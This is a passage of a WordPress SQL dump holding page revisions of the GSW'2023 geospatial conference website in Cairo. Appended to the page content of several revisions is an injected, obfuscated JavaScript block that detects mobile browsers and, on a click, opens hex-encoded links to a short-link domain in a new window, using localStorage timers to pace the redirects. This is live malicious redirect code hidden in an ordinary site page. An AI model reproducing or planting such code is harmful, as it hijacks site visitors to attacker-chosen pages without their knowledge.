_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:11:53','2022-11-09 16:11:53','',3066,'https://gsw2023.com/?p=3152',0,'revision','',0),
(3153,1,'2022-11-09 16:12:34','2022-11-09 16:12:34','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010349074{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:12:34','2022-11-09 16:12:34','',3066,'https://gsw2023.com/?p=3153',0,'revision','',0),
(3154,1,'2022-11-09 16:15:10','2022-11-09 16:15:10','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 